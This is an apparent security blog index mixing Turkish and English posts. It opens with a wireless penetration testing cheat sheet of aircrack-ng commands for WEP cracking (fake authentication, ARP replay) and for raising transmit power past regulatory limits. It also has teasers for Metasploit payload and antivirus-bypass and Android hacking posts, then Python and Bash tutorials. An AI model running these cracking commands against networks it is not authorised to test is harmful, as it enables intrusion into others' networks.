Linux

Wireless Penetration Testing Cheat Sheet

Posted on Updated on


WIRELESS ANTENNA


Kill Monitor Processes

root@uceka:~# airmon-ng check kill

Open the Monitor Mode

root@uceka:~# ifconfig wlan0 down
root@uceka:~# airmon-ng start wlan0
# if you get an error with airmon-ng command, try this ;
# iwconfig wlan0 mode monitor
root@uceka:~# ifconfig wlan0 up

Increase Wi-Fi TX Power

root@uceka:~# iw reg set B0
root@uceka:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto>
#txpower is 30 (generally)
#txpower is depends your country, please googling
root@uceka:~# iwconfig

Change WiFi Channel

root@uceka:~# iwconfig wlan0 channel <SetChannel(1-14)>

WEP CRACKING


 Method 1 : Fake Authentication Attack

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
root@uceka:~# aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

Method 2 : ARP Replay Attack

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -3 –x 1000 –n 1000 –b <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

Read the rest of this entry »

Advertisements

Generating Payloads & Anti-Virus Bypass Methods

Posted on Updated on

Hi everyone… This article aboot is malicious stuff. How we can create payload? How we can connect & listen other’s pc… Yeap,they are all possible with Metasploit or other similar tools. Also; it’s safe for you. You don’t need to use any stealer,keylogger,crypter… Metasploit already has all of it 😉
Follow my steps…

My test machine is ; Windows 7 on the Virtual Machine & Windows 8
Local host ip : 10.34.0.62 (Backtrack 5 R3)
Local port : 4444

You can start with msfconsole or you can directly call meterpreter…
Read the rest of this entry »

Android Phone Hacking via XSSF & Using Content Provider File Exploit

Posted on Updated on

This article is about ; how we can hack android phones. We use;
XSSF  and android exploit (in the metasploit framework). Therefore we use Kali Linux.

My test phone is ; Virtual Device / Android 2.3.3 Emulator on Linux
My test computer is ; Virtual Machine (WMware_Mobisec 1.1)

Here we go;

Read the rest of this entry »

Backtrack 6 Çıktı!

Posted on Updated on

BackTrack Linux’un ilk versiyonu 7 yıl önce yayınlanmıştı… Günümüzde dünyada en yaygın kullanılan Linux dağıtımlarından birisi haline gelen BackTrack; pentest ve güvenlik alanında çalışmalar yapan kişiler için vazgeçilmez bir araç.
BackTrack’ın geliştiricileri yaklaşık olarak bir yıl kadar önce BackTrack 6 hakkında beyin fırtınası yapmaya başlamışlar. En sonunda Kali Linux adında çıkardıkları bu dağıtım, pek çok yenilik barındırmakta… Debian temelli bir dağıtım olan Kali Linux ile Backtrack arasında ne gibi farklar var derseniz eğer; geliştiriciler bu karşılaştırmayı yaparken “çok şey” ve “hiçbir şey” diye ifade ediyorlar. Aslında sizin BackTrack’ı hangi amaçlarda kullandığınız ile ilgili olarak aradaki farklar da değişiyor. Bu dağıtımın en büyük yeniliklerinden birisi de; cep telefonları, tablet ve bazı bilgisayar vb. kullanılan ARM işlemci destekleyen cihazlarda içinde  kullanılabilmesi.
Tamamen ücretsiz olan bu dağıtım 300’den fazla pentest aracı içermekte.Örnek ekran görüntüleri;
Read the rest of this entry »

Python Programlama – 2

Posted on Updated on

Python programlama yazı serisinin ikinci kısmını içerecek bu yazıda; örneklerle döngüler, fonksiyonlar ve nesne-sınıf yaplarını anlatmaya çalışacağım. Bu yazı serisinin ilk kısmına buradan erişebilirsiniz.

Döngüler

‘While’ Döngüsü

Bilindiği üzere “while” komutu algoritmik notasyonlarda ‘.. olduğu sürece’ anlamına gelmektedir. Örneğin ;
Read the rest of this entry »

Python Programlama – 1

Posted on Updated on

Python; söz dizimi basit,parantezler yerine girintilerle yazılan,nesne tabanlı çok hoş bir programlama dilidir. Python ile birçok platform da (Unix,Linux,Solaris,Windows) ve birçok alanda (sistem programlama, veritabanı, ağ programlama vb…) geliştirme yapabilirsiniz.Bunu yapan abimiz Guido van Rossum , programlama diline ismini “Monty Python’s Flying Circus” komedi programından vermiş. Gel gelelim python nasıl yazılır,nasıl çalıştırılır kısmına ;

Geliştirme işini Linux’da yapıyorsak; boş bir metin dosyası oluşturup,ilk satırına aşağıdaki komutu yazmamız gerekmektedir.

#!/usr/bin/env python
#program kodu buraya...

Read the rest of this entry »

Linux & Bash Script

Posted on Updated on

Bu yazıda Linux’un yapısına kabaca göz atıp, bash script ile ilgili örnekler anlatmaya çalışacağım… Linux’u sıfırdan anlatmak yerine şurada ki ve şurada ki yazıya bakmanızı önerebilirim… Az çok bilgi sahibi iseniz devam edebiliriz;

Katmanlar
Linux işletim sistemi 4 katmana ayrılabilir:

  • Donanım: CPU/RAM gibi donanımlardır.
  • Çekirdek: Kernel, sürücüler bulunur. Çalıştırılması istenen komutlara cevabı verir.
  • Kabuk: Çalıştırılması istenen komutları çalıştırır.
  • Uygulama: Kullanıcıya en yakın katmandır.

Kullanıcı uygulama ile komutu çalıştırma isteğinde bulunur. Uygulama bu isteği alır ve  kabuğa gönderir. Kabuk komutu çalıştırır ve çekirdeğe gönderir. Çekirdek bir cevap üretir ve cevabı kabuğa geri yollar. Kabuk uygulamaya, uygulama da kullanıcıya geri bildirimde bulunur.
Bilindiği gibi Linux da her şey dosyadır. En üstte bir kök(root) bulunur, belli bir hiyerarşi ile bunlar sıralanır. Eğer bir programı/paketi silmek istiyorsanız bulunduğu dosyayı silmeniz yeterli olacaktır. Windows da olduğu gibi kayıt defteri gibi benzeri yapılar barındırmaz. Windows’a program ekleyip kaldırdıkça kayıt defterinde gereksiz birçok şeyin izi kalır, bu nedenle zamanla performans azalır. Linux da durum dosya/dizin mantığı ile çözüldüğü için bu gibi sorunlar oluşmamaktadır.
Önemli dosya/dizin kavramlarına ve linux komutlarına şurada daha önce değinmiştik.
Read the rest of this entry »